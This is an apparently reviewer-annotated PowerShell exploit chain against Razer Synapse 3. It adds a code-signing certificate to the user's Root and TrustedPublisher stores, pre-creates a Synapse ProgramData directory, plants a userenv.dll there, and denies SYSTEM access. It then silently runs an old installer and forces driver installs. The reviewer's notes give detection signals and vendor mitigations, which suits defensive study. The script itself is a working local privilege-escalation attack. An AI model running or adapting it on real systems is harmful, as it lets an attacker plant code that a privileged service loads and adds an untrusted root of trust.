- ###------------------IMPORTING THE CERTIFICATE TO TRUSTED ZONE--------------------------------------
- # Section summary: loads a code-signing certificate from a PFX file and adds it to the
- # current user's TrustedPublisher and Root certificate stores.
- # NOTE(review): a certificate present in both stores makes signatures produced with its key
- # trusted for this user, so this is a trust-anchor change, not a routine import. Defenders can
- # watch for new entries under HKCU\Software\Microsoft\SystemCertificates\Root\Certificates and
- # HKCU\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates.
- # Define the path to your .pfx file
- $pfxPath = "C:\Temp\code_signing_cert.pfx"
- # Load the PFX into an in-memory certificate object. The password argument is $null, so the
- # file is expected to be unprotected; PersistKeySet keeps any imported private key in its key
- # container after the import. Nothing is written to a certificate store by these two lines.
- # NOTE(review): a trust anchor needs only the public certificate; presumably the PFX also holds
- # the signing key, which would then sit unprotected in C:\Temp - TODO confirm.
- $pfx = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2
- $pfx.Import($pfxPath, $null, [System.Security.Cryptography.X509Certificates.X509KeyStorageFlags]::PersistKeySet)
- # Add the certificate to the Trusted Publishers store (CurrentUser scope)
- $store = New-Object System.Security.Cryptography.X509Certificates.X509Store "TrustedPublisher", "CurrentUser"
- $store.Open([System.Security.Cryptography.X509Certificates.OpenFlags]::ReadWrite)
- $store.Add($pfx)
- $store.Close()
- # (Optional) adding it to the Root store to fully trust it
- # NOTE(review): this makes the certificate a root of trust for the user, which is a much wider
- # grant than TrustedPublisher alone; root-store additions made outside managed policy are a
- # high-value audit event.
- $rootStore = New-Object System.Security.Cryptography.X509Certificates.X509Store "Root", "CurrentUser"
- $rootStore.Open([System.Security.Cryptography.X509Certificates.OpenFlags]::ReadWrite)
- $rootStore.Add($pfx)
- $rootStore.Close()
- #------------------Create the vulnerable directory--------------------
- # Section summary: creates C:\ProgramData\Razer\Synapse3\Service ahead of the installer run
- # further down, moves C:\Temp\userenv.dll into it, then adds a Deny/FullControl rule for
- # SYSTEM on that directory.
- # NOTE(review): the weakness class here is a product trusting a ProgramData path that a user
- # could create first. Vendor-side mitigations are to create the directory with a restrictive
- # ACL at install time, to check ownership and ACL of a pre-existing directory, and to load
- # DLLs only from protected locations.
- # Define the directory path
- $directoryPath = 'C:\ProgramData\Razer\Synapse3\Service'
- # -Force means no error is raised if the directory already exists.
- New-Item -ItemType Directory -Path $directoryPath -Force
- # Moving the dll file to the vulnerable directory. As an alternative solution, it's possible to download the file from a hosting server.
- # NOTE(review): userenv.dll is the name of a Windows system DLL; a file with that name in a
- # vendor directory under ProgramData is a strong detection signal. The destination is written
- # out literally here rather than taken from $directoryPath.
- Move-Item -Path "C:\Temp\userenv.dll" -Destination "C:\ProgramData\Razer\Synapse3\Service" -Force
- # Define the path to the directory (same value as assigned above)
- $directoryPath = "C:\ProgramData\Razer\Synapse3\Service"
- # Verify that the directory exists and block SYSTEM access
- if (Test-Path -Path $directoryPath) {
- # Create a new Deny access rule for the SYSTEM account
- # NOTE(review): the page does not say why SYSTEM is denied. An explicit Deny ACE for SYSTEM on
- # an application directory is rare in normal software and worth alerting on.
- $denyRule = New-Object System.Security.AccessControl.FileSystemAccessRule("SYSTEM", "FullControl", "Deny")
- # Directly modify the ACL to block access for SYSTEM: read the access section of the
- # directory's security descriptor, append the rule, and write the descriptor back.
- $acl = (Get-Item $directoryPath).GetAccessControl('Access')
- $acl.AddAccessRule($denyRule)
- (Get-Item $directoryPath).SetAccessControl($acl)
- }
- # Define the path to the installer, as an alternative solution, it can be downloaded from a hosting server
- # NOTE(review): the installer is taken from C:\Temp and nothing here checks its signature or
- # hash before it is executed. Whether this particular build is affected by the directory issue
- # cannot be told from the page; the file name suggests a 3.6 release - TODO confirm against the
- # vendor's advisory and prefer a current release.
- $installerPath = "C:\Temp\Razer_Synapse_3.6.exe"
- # Installing the Razer Synapse: runs the installer with silent/quiet/no-restart switches and
- # blocks until the installer process exits (-Wait). The exit code is not captured or checked.
- Start-Process -FilePath $installerPath -ArgumentList "/silent", "/quiet", "/norestart" -Wait
- #------------------------------------EXtra effort which didn't trigger the driver installation-----------------------------
- # Section summary: writes a USB device key with DeviceDesc and HardwareID values under
- # HKLM\SYSTEM\CurrentControlSet\Enum\USB. The header above records that this did not cause a
- # driver installation.
- # NOTE(review): write access under HKLM\...\Enum is normally tightly restricted, so these calls
- # are expected to fail for an ordinary user - TODO confirm in the environment under test.
- # Script-driven writes to this path are unusual and worth logging.
- #Emulate the hardware by setting the necessary registry keys
- # 1532 is the USB vendor ID registered to Razer; the product ID is the script author's choice.
- $vendorID = "1532"
- $deviceID = "008A"
- $regPath = "HKLM:\SYSTEM\CurrentControlSet\Enum\USB\VID_$vendorID&PID_$deviceID"
- # Create the registry structure to emulate the Razer hardware
- # Output of each call is discarded with Out-Null, and -Force overwrites any existing key or
- # value; the calls are not checked for success.
- New-Item -Path $regPath -Force | Out-Null
- New-ItemProperty -Path $regPath -Name "DeviceDesc" -Value "Razer Virtual Mouse" -PropertyType String -Force | Out-Null
- New-ItemProperty -Path $regPath -Name "HardwareID" -Value "USB\VID_$vendorID&PID_$deviceID" -PropertyType MultiString -Force | Out-Null
- #_---------------------TO trigger the windows update----------------------------------------
- # Section summary: uses the Windows Update Agent COM interface to search for driver updates
- # that are not installed and then asks the agent to install everything the search returned.
- # NOTE(review): the selection is every pending driver update, not one vendor's, so this is a
- # broad system change; on managed machines driver installs should go through update policy.
- # A script host creating Microsoft.Update.Session is a useful telemetry point.
- # Trigger Windows Update to check for new drivers
- $updateSession = New-Object -ComObject Microsoft.Update.Session
- $updateSearcher = $updateSession.CreateUpdateSearcher()
- # Search for driver updates that are not yet installed
- $searchResult = $updateSearcher.Search("IsInstalled=0 and Type='Driver'")
- # Check if any driver updates are found
- if ($searchResult.Updates.Count -gt 0) {
- # Prepare to install all found driver updates by copying them into a new update collection
- $updatesToInstall = New-Object -ComObject Microsoft.Update.UpdateColl
- foreach ($update in $searchResult.Updates) {
- $updatesToInstall.Add($update) | Out-Null
- }
- # Install the updates
- # The result object is stored in $installationResult but never inspected, so a failed or
- # partial installation goes unreported by this script.
- $installer = $updateSession.CreateUpdateInstaller()
- $installer.Updates = $updatesToInstall
- $installationResult = $installer.Install()
- }